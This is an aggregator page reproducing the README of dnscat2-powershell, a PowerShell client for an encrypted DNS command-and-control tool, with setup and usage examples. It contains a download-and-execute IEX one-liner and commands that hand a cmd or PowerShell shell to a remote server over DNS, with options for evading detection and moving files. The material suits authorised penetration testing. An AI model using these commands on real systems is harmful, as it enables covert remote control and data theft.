GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → lukebaggett → Dnscat2 Powershell

lukebaggett / Dnscat2 Powershell

A Powershell client for dnscat2, an encrypted DNS command and control tool.

Programming Languages

powershell
5483 projects

Labels

securitypenetration-testing

Projects that are alternatives of or similar to Dnscat2 Powershell

Elliot
A pentesting tool inspired by mr robot and derived by zphisher
Stars: ✭ 23 (-92.2%)
Mutual labels:  penetration-testing
Arachni
Web Application Security Scanner Framework
Stars: ✭ 2,942 (+897.29%)
Mutual labels:  penetration-testing
Novahot
A webshell framework for penetration testers.
Stars: ✭ 284 (-3.73%)
Mutual labels:  penetration-testing
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: ✭ 48 (-83.73%)
Mutual labels:  penetration-testing
Subscraper
Subdomain enumeration through various techniques
Stars: ✭ 265 (-10.17%)
Mutual labels:  penetration-testing
Penetration testing poc
渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+1207.8%)
Mutual labels:  penetration-testing
xss-chef
A web application for generating custom XSS payloads
Stars: ✭ 70 (-76.27%)
Mutual labels:  penetration-testing
Cheatsheet God
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Stars: ✭ 3,521 (+1093.56%)
Mutual labels:  penetration-testing
Hacking Security Ebooks
Top 100 Hacking & Security E-Books (Free Download)
Stars: ✭ 3,232 (+995.59%)
Mutual labels:  penetration-testing
East
Exploits and Security Tools Framework 2.0.1
Stars: ✭ 283 (-4.07%)
Mutual labels:  penetration-testing
Writeups
This repository contains writeups for various CTFs I've participated in (Including Hack The Box).
Stars: ✭ 61 (-79.32%)
Mutual labels:  penetration-testing
Fsociety
A Modular Penetration Testing Framework
Stars: ✭ 259 (-12.2%)
Mutual labels:  penetration-testing
Faraday
Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distributing, indexing, and analyzing the data generated during a security audit.
Stars: ✭ 3,198 (+984.07%)
Mutual labels:  penetration-testing
PandorasBox
Security tool to quickly audit Public Box files and folders.
Stars: ✭ 56 (-81.02%)
Mutual labels:  penetration-testing
Osmedeus
Fully automated offensive security framework for reconnaissance and vulnerability scanning
Stars: ✭ 3,391 (+1049.49%)
Mutual labels:  penetration-testing
AriaCloud
A Docker container for remote penetration testing.
Stars: ✭ 105 (-64.41%)
Mutual labels:  penetration-testing
Free Security Ebooks
Free Security and Hacking eBooks
Stars: ✭ 3,132 (+961.69%)
Mutual labels:  penetration-testing
Hacker101 Ctf
Hacker101 CTF Writeup
Stars: ✭ 295 (+0%)
Mutual labels:  penetration-testing
Whatweb
Next generation web scanner
Stars: ✭ 3,503 (+1087.46%)
Mutual labels:  penetration-testing
Sitebroker
A cross-platform python based utility for information gathering and penetration testing automation!
Stars: ✭ 281 (-4.75%)
Mutual labels:  penetration-testing
View All Similar Projects ➔ 
- The upload and download functions inside the command session only work consistently with small files.
- Please use the original executable client if you require larger file transfers.

dnscat2 is a DNS covert channel tool by @iagox86 (Ron Bowes) which is used to transfer data over DNS requests.

This is a powershell version of the dnscat2 C client.

Click here for a blog post that gives a more detailed breakdown of the purpose of this script, and how to use it.

To use this script, you'll need the ruby dnscat2 server. Make sure to add the --no-cache option when running the server. This client is incompatible with the server's caching.

Setup

First, install the dnscat2 server. Start the server with caching disabled using --no-cache. The command to start your server should look something like this: ruby dnscat2.rb --dns="domain=example.com" --no-cache

Next, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Examples

Start-Dnscat2 is the actual function used as the client. Specifiy the dnscat2 server using -Domain.

Start a command session, and send DNS requests to 8.8.8.8 on port 53:
    Start-Dnscat2 -Domain <dnscat2 server> -DNSServer 8.8.8.8

Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:
    Start-Dnscat2 -Domain <dnscat2 server> -Exec cmd

Start a console session. Only use CNAME, MX, and AAAA requests:
    Start-Dnscat2 -Domain <dnscat2 server> -LookupTypes @("CNAME","MX","AAAA") -Console

Do not encrypt the session. Encryption is enabled by default.
    Start-Dnscat2 -Domain <dnscat2 server> -NoEncryption

Powershell Command Session Commands

The client can handle normal dnscat2 commands, or the powershell version of that command. To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):

Start a new session which simulates a Powershell shell, like ExecPS:
    exec psh

Upload app.exe on the server into a hex string stored in the $app powershell variable:
    upload app.exe hex:$app

Download the byte array stored in the $app powershell variable to app.exe on the server:
    download bytes:$app app.exe

Start-Dnscat2

-Domain <String>          The Domain being used by the dnscat2 server.
-DNSServer <String>       The hostname or IP Address to send DNS queries to. (Default: Set by Windows)
-DNSPort <Int32>          The port to send DNS queries to. (Default: 53)

-Command                  Start a command session. (Default)
-Exec <String>            Link the I/O of a process with the Dnscat2 session.
-Console                  Link the I/O of the console with the Dnscat2 session.
-ExecPS                   Simulate a Powershell session and link the IO with the Dnscat2 session.
                          WARNING: Exiting will kill the entire dnscat2 client, not just the session.

-PreSharedSecret          Set the same secret on the server to authenticate and prevent MITM.
-NoEncryption             Do not use encryption.

-LookupTypes <String[]>   Set an array of lookup types to randomly switch between.
                          Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)
-Delay <Int32>            Set a delay between each request, in milliseconds. (Default: 0)
-MaxRandomDelay <Int32>   Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)
-MaxPacketSize <Int32>    Maximum length of a dnscat2 packet. (Default: 240)
-Name <String>            The name of your dnscat2 session. (Default: hostname)

ExecPS and 'exec psh'

dnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. Watch out for things that exit powershell like "exit" and "break", because the entire dnscat2-powershell client will exit, not just the ExecPS session.

Other Credits

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].